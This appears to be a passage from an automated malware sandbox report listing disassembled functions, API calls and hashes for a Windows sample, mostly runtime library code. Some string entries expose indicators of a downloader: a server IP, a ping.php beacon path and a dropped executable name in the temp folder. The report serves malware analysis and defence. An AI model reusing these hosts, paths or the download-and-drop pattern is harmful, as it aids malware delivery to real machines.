                                                                                                                                                                                                                                  • Opcode ID: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction ID: 895aa7ca95bfe32917cece0cc4021e99c0fa9e15b4dc78af84e68f763d0dcda6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E01A172A01114BBDB04AF89DC41BAEF769EF89315F10013FF805E3291D3789E4186E9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00417D6F Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                  • Opcode ID: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                  • Instruction ID: 95edb75e536639b33972a857d440f8be94c0c6db010a7eda39038c13656bb89e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FA11372A083869FDB218F18C8817EBBBF1EF55354F1541AEE4859B381C63C8D82C758
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042299F Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: f01287b46ae53a51101a135f4392dfdbeaf8165ae30d8bdb7f55eb9fcaa53402
                                                                                                                                                                                                                                  • Instruction ID: c8489a2078e21136fa723fa80d13f2eda68097992bc6546b806c704246c56682
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f01287b46ae53a51101a135f4392dfdbeaf8165ae30d8bdb7f55eb9fcaa53402
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE414C31B402217BDB306E7A9D41BAF3A64EF45374F54025BF818D6691DAFC8C9182AD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040CCA4 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0040CCBE
                                                                                                                                                                                                                                    • Part of subcall function 0040CC0B: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC3A
                                                                                                                                                                                                                                    • Part of subcall function 0040CC0B: ___AdjustPointer.LIBCMT ref: 0040CC55
                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 0040CCD3
                                                                                                                                                                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCE4
                                                                                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 0040CD0C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 737400349-0
                                                                                                                                                                                                                                  • Opcode ID: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                  • Instruction ID: 6cd8a4fdf9e309ef40a66346d060796d29459ceaa081db5c793327cde4683266
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA012D72500108BBDF116F96CC81DEB3F69EF98758F044129FE0866261C73AE861DBA4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041293D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 004129CD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                  • Opcode ID: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
                                                                                                                                                                                                                                  • Instruction ID: e0eefe9174cd7462181434ea84c362ca9420c476202b864f0baa4bab5f354a80
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D515DB1B5420196C7217B19CE813EB2B90EB40744F64496BE085C23E8EB7D8CE7DA4E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041E281 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041DE54: GetOEMCP.KERNEL32(00000000,?,?,0041E0DD,?), ref: 0041DE7F
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0041E122,?,00000000), ref: 0041E2F5
                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,"A,?,?,?,0041E122,?,00000000), ref: 0041E308
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                  • String ID: "A
                                                                                                                                                                                                                                  • API String ID: 546120528-1838006985
                                                                                                                                                                                                                                  • Opcode ID: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
                                                                                                                                                                                                                                  • Instruction ID: 9adfac426f14955098f9a8953225ebda5108e0851b5f4a0d8690ab915da4ef9e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F511774A002499EDB208F36C8846FBBBE5EF51304F14446FD8A68B251D73D95C6CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041DF2C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DF51
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Info
                                                                                                                                                                                                                                  • String ID: $^A
                                                                                                                                                                                                                                  • API String ID: 1807457897-1499568600
                                                                                                                                                                                                                                  • Opcode ID: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
                                                                                                                                                                                                                                  • Instruction ID: 9b2ab00e05afc5395f67001553a0f729d0bbf79a9b46b691f859092dfb419bf1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46415CB49042589EDB218E25CC80BFABFE9DB49304F1404EEE58A87143D2799AC6CF64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041FEC2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0042011D,?,00000050,?,?,?,?,?), ref: 0041FF9D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                  • API String ID: 0-711371036
                                                                                                                                                                                                                                  • Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction ID: dacf84d8a1ebef4056087089fc013b288552bfb44d7b698df7e4a4e4da77cf20
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F721F472B04101A6D7308B54D901BDBA3A6EB52B24F564077F90AC7301FBBADDCBC258
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004171B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00417217
                                                                                                                                                                                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                                                                  • String ID: -@
                                                                                                                                                                                                                                  • API String ID: 2279764990-2564449678
                                                                                                                                                                                                                                  • Opcode ID: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
                                                                                                                                                                                                                                  • Instruction ID: f4ec00a39f4fcae9ee9be6b99cea2ca8987fdb4a8322dd671adfd3fbebc4ff23
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65110A33A042205B9B369E19EC80ADB73B5EB847247164172FD29BB354DB34DCC2C6D9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004034E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
                                                                                                                                                                                                                                  • API String ID: 3519838083-2876206925
                                                                                                                                                                                                                                  • Opcode ID: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                  • Instruction ID: 15a4cf94b989c4b5e0a43b8c54f1cb92ed8d46dd15ee7e513d2018d21c6c36cd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB11C232A01014BBDB00AF89DC01BAEB779EF49314F40003EF805A3291D3799B5187A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402FE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                  • std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                  • String ID: T*@
                                                                                                                                                                                                                                  • API String ID: 4198646248-2370032326
                                                                                                                                                                                                                                  • Opcode ID: d0eaefa58f6fde832fef2458de955be1af219eff9044b882e2f0086fe7818694
                                                                                                                                                                                                                                  • Instruction ID: dd23321e4c46181b40e5f98da61592ca99a58c04279906981af05f8f2703ec12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0eaefa58f6fde832fef2458de955be1af219eff9044b882e2f0086fe7818694
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2321B0B5A00A06AFC305CF6AD581995FBF4FF48314B40826FE80987B50E774B924CFA4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040436E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00404373
                                                                                                                                                                                                                                    • Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47
                                                                                                                                                                                                                                  • __Getcoll.LIBCPMT ref: 004043CF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$Getcoll
                                                                                                                                                                                                                                  • String ID: u@@
                                                                                                                                                                                                                                  • API String ID: 206117190-736001340
                                                                                                                                                                                                                                  • Opcode ID: d664a231bda773a3cd6c064b295e09fc09c6187729f09baed323597af0611d79
                                                                                                                                                                                                                                  • Instruction ID: c779ab9f98323ff8677db40664eca0c2ffeff6dd5383222ff5ea7a01e0671416
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d664a231bda773a3cd6c064b295e09fc09c6187729f09baed323597af0611d79
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 871170B19012099FCB04EFA9C581A9DF7B4FF44304F10847FE545BB281DB789A44CB95
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042631A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,00425B8E,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426324
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PathTemp
                                                                                                                                                                                                                                  • String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
                                                                                                                                                                                                                                  • API String ID: 2920410445-1161945460
                                                                                                                                                                                                                                  • Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction ID: d0e7d276ca818b5a52dc3a1143c2d6cc19e203c39cc505e05bbffc3e6100e946
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17E026123088110A5F29482D3818AAFDF03DFD261038582AAD88307345CD410C0BD2B0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041A7FD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A893
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A8A1
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A8FC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                                                  • Opcode ID: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                  • Instruction ID: ef74c1d6368c920b9f03e6eff6a6fb43ae41f0a69c5039c94680ed31baa92590
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D410770602206AFCB219F65C844AEF7BA4AF01310F16456FED599B291DB388CE2C75A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:5.2%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:2.5%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:1107
                                                                                                                                                                                                                                  Total number of Limit Nodes:14
                                                                                                                                                                                                                                  execution_graph 44535 408273 44538 40828f 44535->44538 44536 4082db 44537 4082ce 44543 4082d5 44537->44543 44545 40831c 44537->44545 44538->44536 44538->44537 44541 40831c std::_Xfsopen 29 API calls 44538->44541 44541->44537 44543->44536 44551 40e228 44543->44551 44564 411d32 44545->44564 44547 4082ee 44547->44536 44548 4106ef 44547->44548 44625 41049b 44548->44625 44550 410705 44550->44543 44552 40e234 CallCatchBlock 44551->44552 44553 40e245 44552->44553 44554 40e25a 44552->44554 44723 412381 20 API calls __dosmaperr 44553->44723 44563 40e255 _Xfiopen std::_Locinfo::_Locinfo_dtor 44554->44563 44706 40e81d EnterCriticalSection 44554->44706 44557 40e24a 44724 410905 26 API calls _Deallocate 44557->44724 44558 40e276 44707 40e1b2 44558->44707 44561 40e281 44725 40e29e LeaveCriticalSection _Xfiopen 44561->44725 44563->44536 44566 411c71 CallCatchBlock 44564->44566 44565 411c8b 44589 412381 20 API calls __dosmaperr 44565->44589 44566->44565 44568 411cb8 44566->44568 44570 411cca 44568->44570 44571 411cbd 44568->44571 44569 411c90 44590 410905 26 API calls _Deallocate 44569->44590 44581 416499 44570->44581 44591 412381 20 API calls __dosmaperr 44571->44591 44575 411cd3 44577 411ce7 std::_Xfsopen 44575->44577 44578 411cda 44575->44578 44576 411c9b std::_Locinfo::_Locinfo_dtor 44576->44547 44593 411d1b LeaveCriticalSection _Xfiopen 44577->44593 44592 412381 20 API calls __dosmaperr 44578->44592 44582 4164a5 CallCatchBlock 44581->44582 44594 411a06 EnterCriticalSection 44582->44594 44584 4164b3 44595 416533 44584->44595 44588 4164e4 std::_Locinfo::_Locinfo_dtor 44588->44575 44589->44569 44590->44576 44591->44576 44592->44576 44593->44576 44594->44584 44599 416556 44595->44599 44596 4164c0 44609 4164ef 44596->44609 44597 4165af 44614 41704e 20 API calls 3 library calls 44597->44614 44599->44596 44599->44597 44612 40e81d EnterCriticalSection 44599->44612 44613 40e831 LeaveCriticalSection 44599->44613 44600 4165b8 44615 41629a 44600->44615 44603 4165c1 44603->44596 44621 4175b5 11 API calls 2 library calls 44603->44621 44605 4165e0 44622 40e81d EnterCriticalSection 44605->44622 44608 4165f3 44608->44596 44624 411a4e LeaveCriticalSection 44609->44624 44611 4164f6 44611->44588 44612->44599 44613->44599 44614->44600 44616 4162ce __dosmaperr 44615->44616 44617 4162a5 RtlFreeHeap 44615->44617 44616->44603 44617->44616 44618 4162ba 44617->44618 44623 412381 20 API calls __dosmaperr 44618->44623 44620 4162c0 GetLastError 44620->44616 44621->44605 44622->44608 44623->44620 44624->44611 44626 4104a7 CallCatchBlock 44625->44626 44627 4104b3 44626->44627 44629 4104d9 44626->44629 44650 412381 20 API calls __dosmaperr 44627->44650 44638 40e81d EnterCriticalSection 44629->44638 44630 4104b8 44651 410905 26 API calls _Deallocate 44630->44651 44633 4104e5 44639 4105fb 44633->44639 44635 4104f9 44652 410518 LeaveCriticalSection _Xfiopen 44635->44652 44637 4104c3 std::_Locinfo::_Locinfo_dtor 44637->44550 44638->44633 44640 41061d 44639->44640 44641 41060d 44639->44641 44653 410522 44640->44653 44666 412381 20 API calls __dosmaperr 44641->44666 44644 410612 44644->44635 44645 4106bf 44645->44635 44647 410640 _Xfiopen 44647->44645 44657 40dfcb 44647->44657 44650->44630 44651->44637 44652->44637 44654 410535 44653->44654 44656 41052e _Xfiopen 44653->44656 44655 419800 _Xfiopen 28 API calls 44654->44655 44654->44656 44655->44656 44656->44647 44658 40dfe3 44657->44658 44659 40dfdf 44657->44659 44658->44659 44667 4154e8 44658->44667 44663 419800 44659->44663 44661 40e003 44674 415fa3 62 API calls 6 library calls 44661->44674 44677 419767 44663->44677 44666->44644 44668 4154f4 44667->44668 44669 415509 44667->44669 44675 412381 20 API calls __dosmaperr 44668->44675 44669->44661 44671 4154f9 44676 410905 26 API calls _Deallocate 44671->44676 44673 415504 44673->44661 44674->44659 44675->44671 44676->44673 44686 41e97a 44677->44686 44679 419779 44680 419781 44679->44680 44681 419792 SetFilePointerEx 44679->44681 44699 412381 20 API calls __dosmaperr 44680->44699 44682 4197aa GetLastError 44681->44682 44685 419786 44681->44685 44700 41234b 20 API calls 